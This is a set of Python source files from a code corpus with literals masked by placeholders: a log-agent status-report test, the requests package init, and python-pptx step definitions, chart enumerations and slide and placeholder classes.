total_bytes_pending = <NUM_LIT> <EOL> process_status . total_bytes_skipped = <NUM_LIT:12> <EOL> process_status . total_bytes_failed = <NUM_LIT> <EOL> process_status . total_bytes_dropped_by_sampling = <NUM_LIT:0> <EOL> process_status . total_lines_copied = <NUM_LIT> <EOL> process_status . total_lines_dropped_by_sampling = <NUM_LIT:0> <EOL> process_status . total_redactions = <NUM_LIT:0> <EOL> process_status = LogProcessorStatus ( ) <EOL> log_matcher . log_processors_status . append ( process_status ) <EOL> process_status . log_path = '<STR_LIT>' <EOL> process_status . last_scan_time = self . time - <NUM_LIT> <EOL> process_status . total_bytes_copied = <NUM_LIT> <EOL> process_status . total_bytes_pending = <NUM_LIT> <EOL> process_status . total_bytes_skipped = <NUM_LIT:12> <EOL> process_status . total_bytes_failed = <NUM_LIT> <EOL> process_status . total_bytes_dropped_by_sampling = <NUM_LIT:5> <EOL> process_status . total_lines_copied = <NUM_LIT> <EOL> process_status . total_lines_dropped_by_sampling = <NUM_LIT:10> <EOL> process_status . total_redactions = <NUM_LIT:10> <EOL> log_matcher = LogMatcherStatus ( ) <EOL> copying_status . log_matchers . append ( log_matcher ) <EOL> log_matcher . is_glob = True <EOL> log_matcher . last_check_time = self . time - <NUM_LIT:10> <EOL> log_matcher . log_path = '<STR_LIT>' <EOL> monitor_manager = MonitorManagerStatus ( ) <EOL> self . status . monitor_manager_status = monitor_manager <EOL> monitor_manager . total_alive_monitors = <NUM_LIT:2> <EOL> monitor_status = MonitorStatus ( ) <EOL> monitor_manager . monitors_status . append ( monitor_status ) <EOL> monitor_status . is_alive = True <EOL> monitor_status . monitor_name = '<STR_LIT>' <EOL> monitor_status . reported_lines = <NUM_LIT:50> <EOL> monitor_status . errors = <NUM_LIT:2> <EOL> monitor_status = MonitorStatus ( ) <EOL> monitor_manager . monitors_status . append ( monitor_status ) <EOL> monitor_status . is_alive = True <EOL> monitor_status . 
monitor_name = '<STR_LIT>' <EOL> monitor_status . reported_lines = <NUM_LIT:20> <EOL> monitor_status . errors = <NUM_LIT:0> <EOL> monitor_status = MonitorStatus ( ) <EOL> monitor_manager . monitors_status . append ( monitor_status ) <EOL> monitor_status . is_alive = False <EOL> monitor_status . monitor_name = '<STR_LIT>' <EOL> monitor_status . reported_lines = <NUM_LIT:20> <EOL> monitor_status . errors = <NUM_LIT> <EOL> def test_basic ( self ) : <EOL> output = cStringIO . StringIO ( ) <EOL> report_status ( output , self . status , self . time ) <EOL> expected_output = """<STR_LIT>""" <EOL> self . assertEquals ( expected_output , output . getvalue ( ) ) <EOL> def test_bad_config ( self ) : <EOL> self . status . config_status . last_error = '<STR_LIT>' <EOL> output = cStringIO . StringIO ( ) <EOL> report_status ( output , self . status , self . time ) <EOL> expected_output = """<STR_LIT>""" <EOL> self . assertEquals ( expected_output , output . getvalue ( ) ) <EOL> def test_bad_copy_response ( self ) : <EOL> self . status . copying_manager_status . last_response = '<STR_LIT>' <EOL> self . status . copying_manager_status . last_response_status = '<STR_LIT:error>' <EOL> self . status . copying_manager_status . total_errors = <NUM_LIT:5> <EOL> output = cStringIO . StringIO ( ) <EOL> report_status ( output , self . status , self . time ) <EOL> expected_output = """<STR_LIT>""" <EOL> self . assertEquals ( expected_output , output . getvalue ( ) ) </s>
<s> """<STR_LIT>""" <EOL> __title__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> __build__ = <NUM_LIT> <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> try : <EOL> from . packages . urllib3 . contrib import pyopenssl <EOL> pyopenssl . inject_into_urllib3 ( ) <EOL> except ImportError : <EOL> pass <EOL> from . import utils <EOL> from . models import Request , Response , PreparedRequest <EOL> from . api import request , get , head , post , patch , put , delete , options <EOL> from . sessions import session , Session <EOL> from . status_codes import codes <EOL> from . exceptions import ( <EOL> RequestException , Timeout , URLRequired , <EOL> TooManyRedirects , HTTPError , ConnectionError , <EOL> FileModeWarning , ConnectTimeout , ReadTimeout <EOL> ) <EOL> import logging <EOL> try : <EOL> from logging import NullHandler <EOL> except ImportError : <EOL> class NullHandler ( logging . Handler ) : <EOL> def emit ( self , record ) : <EOL> pass <EOL> logging . getLogger ( __name__ ) . addHandler ( NullHandler ( ) ) <EOL> import warnings <EOL> warnings . simplefilter ( '<STR_LIT:default>' , FileModeWarning , append = True ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from behave import given , then <EOL> from pptx import Presentation <EOL> from pptx . enum . shapes import PP_PLACEHOLDER <EOL> from pptx . parts . slidelayout import SlideLayout <EOL> from pptx . parts . slidemaster import ( <EOL> _MasterPlaceholders , _MasterShapeTree , _SlideLayouts <EOL> ) <EOL> from pptx . shapes . base import BaseShape <EOL> from pptx . shapes . placeholder import MasterPlaceholder <EOL> from helpers import test_pptx <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_master_placeholder_collection ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . master_placeholders = prs . slide_master . placeholders <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_master_shape_collection_containing_two_shapes ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . master_shapes = prs . slide_master . shapes <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_master_having_two_placeholders ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . slide_master = prs . slide_master <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_slide_master_having_two_shapes ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . slide_master = prs . slide_master <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_slide_master_having_two_layouts ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . slide_master = prs . slide_master <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_slide_layout_collection_containing_two_layouts ( context ) : <EOL> prs = Presentation ( test_pptx ( '<STR_LIT>' ) ) <EOL> context . slide_layouts = prs . slide_master . slide_layouts <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_master_placeholder_by_index ( context ) : <EOL> master_placeholders = context . 
master_placeholders <EOL> for idx in range ( <NUM_LIT:2> ) : <EOL> master_placeholder = master_placeholders [ idx ] <EOL> assert isinstance ( master_placeholder , MasterPlaceholder ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_master_placeholder_by_type ( context ) : <EOL> master_placeholders = context . master_placeholders <EOL> title_placeholder = master_placeholders . get ( PP_PLACEHOLDER . TITLE ) <EOL> body_placeholder = master_placeholders . get ( PP_PLACEHOLDER . BODY ) <EOL> assert title_placeholder . _element is master_placeholders [ <NUM_LIT:0> ] . _element <EOL> assert body_placeholder . _element is master_placeholders [ <NUM_LIT:1> ] . _element <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_master_shape_by_index ( context ) : <EOL> master_shapes = context . master_shapes <EOL> for idx in range ( <NUM_LIT:2> ) : <EOL> master_shape = master_shapes [ idx ] <EOL> assert isinstance ( master_shape , BaseShape ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_slide_layout_by_index ( context ) : <EOL> slide_layouts = context . slide_layouts <EOL> for idx in range ( <NUM_LIT:2> ) : <EOL> slide_layout = slide_layouts [ idx ] <EOL> assert isinstance ( slide_layout , SlideLayout ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_placeholder_collection_of_slide_master ( context ) : <EOL> slide_master = context . slide_master <EOL> master_placeholders = slide_master . placeholders <EOL> msg = '<STR_LIT>' <EOL> assert isinstance ( master_placeholders , _MasterPlaceholders ) , msg <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_shape_collection_of_slide_master ( context ) : <EOL> slide_master = context . slide_master <EOL> master_shapes = slide_master . shapes <EOL> msg = '<STR_LIT>' <EOL> assert isinstance ( master_shapes , _MasterShapeTree ) , msg <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_access_slide_layouts_of_slide_master ( context ) : <EOL> slide_master = context . slide_master <EOL> slide_layouts = slide_master . 
slide_layouts <EOL> msg = '<STR_LIT>' <EOL> assert isinstance ( slide_layouts , _SlideLayouts ) , msg <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_iterate_over_the_master_placeholders ( context ) : <EOL> master_placeholders = context . master_placeholders <EOL> actual_count = <NUM_LIT:0> <EOL> for master_placeholder in master_placeholders : <EOL> actual_count += <NUM_LIT:1> <EOL> assert isinstance ( master_placeholder , MasterPlaceholder ) <EOL> assert actual_count == <NUM_LIT:2> <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_iterate_over_the_master_shapes ( context ) : <EOL> master_shapes = context . master_shapes <EOL> actual_count = <NUM_LIT:0> <EOL> for master_shape in master_shapes : <EOL> actual_count += <NUM_LIT:1> <EOL> assert isinstance ( master_shape , BaseShape ) <EOL> assert actual_count == <NUM_LIT:2> <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_can_iterate_over_the_slide_layouts ( context ) : <EOL> slide_layouts = context . slide_layouts <EOL> actual_count = <NUM_LIT:0> <EOL> for slide_layout in slide_layouts : <EOL> actual_count += <NUM_LIT:1> <EOL> assert isinstance ( slide_layout , SlideLayout ) <EOL> assert actual_count == <NUM_LIT:2> <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_len_of_master_shape_collection_is_2 ( context ) : <EOL> slide_master = context . slide_master <EOL> master_shapes = slide_master . shapes <EOL> assert len ( master_shapes ) == <NUM_LIT:2> , ( <EOL> '<STR_LIT>' % len ( master_shapes ) <EOL> ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_len_of_placeholder_collection_is_2 ( context ) : <EOL> slide_master = context . slide_master <EOL> master_placeholders = slide_master . placeholders <EOL> assert len ( master_placeholders ) == <NUM_LIT:2> , ( <EOL> '<STR_LIT>' % <EOL> len ( master_placeholders ) <EOL> ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_len_of_slide_layout_collection_is_2 ( context ) : <EOL> slide_master = context . slide_master <EOL> slide_layouts = slide_master . 
slide_layouts <EOL> assert len ( slide_layouts ) == <NUM_LIT:2> , ( <EOL> '<STR_LIT>' % len ( slide_layouts ) <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . base import ( <EOL> alias , Enumeration , EnumMember , ReturnValueOnlyEnumMember , <EOL> XmlEnumeration , XmlMappedEnumMember <EOL> ) <EOL> class XL_CHART_TYPE ( Enumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:15> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , 
<EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:100> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:64> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:5> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> 
EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> EnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> @ alias ( '<STR_LIT>' ) <EOL> class XL_DATA_LABEL_POSITION ( XmlEnumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( 
<EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT:t>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT:b>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:5> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:3> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:l>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ReturnValueOnlyEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:6> , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:r>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> class XL_LEGEND_POSITION ( XmlEnumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:b>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ReturnValueOnlyEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:l>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:r>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:t>' , '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> class XL_TICK_MARK ( XmlEnumeration ) : <EOL> 
"""<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:none>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:3> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> class XL_TICK_LABEL_POSITION ( XmlEnumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:none>' , '<STR_LIT>' <EOL> ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . . import parse_xml <EOL> from . . ns import nsdecls <EOL> from . . simpletypes import XsdString <EOL> from . . xmlchemy import ( <EOL> BaseOxmlElement , OneAndOnlyOne , OptionalAttribute , ZeroOrOne <EOL> ) <EOL> class CT_CommonSlideData ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> spTree = OneAndOnlyOne ( '<STR_LIT>' ) <EOL> name = OptionalAttribute ( '<STR_LIT:name>' , XsdString , default = '<STR_LIT>' ) <EOL> class CT_Slide ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> _tag_seq = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> cSld = OneAndOnlyOne ( '<STR_LIT>' ) <EOL> clrMapOvr = ZeroOrOne ( '<STR_LIT>' , successors = _tag_seq [ <NUM_LIT:2> : ] ) <EOL> del _tag_seq <EOL> @ classmethod <EOL> def new ( cls ) : <EOL> """<STR_LIT>""" <EOL> return parse_xml ( cls . _sld_xml ( ) ) <EOL> @ property <EOL> def spTree ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . cSld . spTree <EOL> @ staticmethod <EOL> def _sld_xml ( ) : <EOL> return ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % nsdecls ( '<STR_LIT:a>' , '<STR_LIT:p>' , '<STR_LIT:r>' ) <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import ( <EOL> absolute_import , division , print_function , unicode_literals <EOL> ) <EOL> from . autoshape import Shape <EOL> from . base import BaseShape <EOL> from . . enum . shapes import MSO_SHAPE_TYPE , PP_PLACEHOLDER <EOL> from . graphfrm import GraphicFrame <EOL> from . . oxml . shapes . graphfrm import CT_GraphicalObjectFrame <EOL> from . . oxml . shapes . picture import CT_Picture <EOL> from . picture import Picture <EOL> from . . util import Emu <EOL> class _InheritsDimensions ( object ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def height ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _effective_value ( '<STR_LIT>' ) <EOL> @ height . setter <EOL> def height ( self , value ) : <EOL> self . _element . cy = value <EOL> @ property <EOL> def left ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _effective_value ( '<STR_LIT:left>' ) <EOL> @ left . setter <EOL> def left ( self , value ) : <EOL> self . _element . x = value <EOL> @ property <EOL> def shape_type ( self ) : <EOL> """<STR_LIT>""" <EOL> return MSO_SHAPE_TYPE . PLACEHOLDER <EOL> @ property <EOL> def top ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _effective_value ( '<STR_LIT>' ) <EOL> @ top . setter <EOL> def top ( self , value ) : <EOL> self . _element . y = value <EOL> @ property <EOL> def width ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _effective_value ( '<STR_LIT:width>' ) <EOL> @ width . setter <EOL> def width ( self , value ) : <EOL> self . _element . cx = value <EOL> def _effective_value ( self , attr_name ) : <EOL> """<STR_LIT>""" <EOL> directly_applied_value = getattr ( <EOL> super ( _InheritsDimensions , self ) , attr_name <EOL> ) <EOL> if directly_applied_value is not None : <EOL> return directly_applied_value <EOL> return self . _inherited_value ( attr_name ) <EOL> def _inherited_value ( self , attr_name ) : <EOL> """<STR_LIT>""" <EOL> layout_placeholder = self . 
_layout_placeholder <EOL> if layout_placeholder is None : <EOL> return None <EOL> inherited_value = getattr ( layout_placeholder , attr_name ) <EOL> return inherited_value <EOL> @ property <EOL> def _layout_placeholder ( self ) : <EOL> """<STR_LIT>""" <EOL> layout , idx = self . _slide_layout , self . _element . ph_idx <EOL> return layout . placeholders . get ( idx = idx ) <EOL> @ property <EOL> def _slide_layout ( self ) : <EOL> """<STR_LIT>""" <EOL> slide = self . part <EOL> return slide . slide_layout <EOL> class _BaseSlidePlaceholder ( _InheritsDimensions , BaseShape ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def is_placeholder ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> @ property <EOL> def shape_type ( self ) : <EOL> """<STR_LIT>""" <EOL> return MSO_SHAPE_TYPE . PLACEHOLDER <EOL> def _replace_placeholder_with ( self , element ) : <EOL> """<STR_LIT>""" <EOL> element . _nvXxPr . nvPr . _insert_ph ( self . _element . ph ) <EOL> self . _element . addprevious ( element ) <EOL> self . _element . getparent ( ) . remove ( self . _element ) <EOL> self . _element = None <EOL> class BasePlaceholder ( Shape ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def idx ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sp . ph_idx <EOL> @ property <EOL> def orient ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sp . ph_orient <EOL> @ property <EOL> def ph_type ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sp . ph_type <EOL> @ property <EOL> def sz ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sp . ph_sz <EOL> class LayoutPlaceholder ( BasePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def height ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _direct_or_inherited_value ( '<STR_LIT>' ) <EOL> @ property <EOL> def left ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _direct_or_inherited_value ( '<STR_LIT:left>' ) <EOL> @ property <EOL> def top ( self ) : <EOL> """<STR_LIT>""" 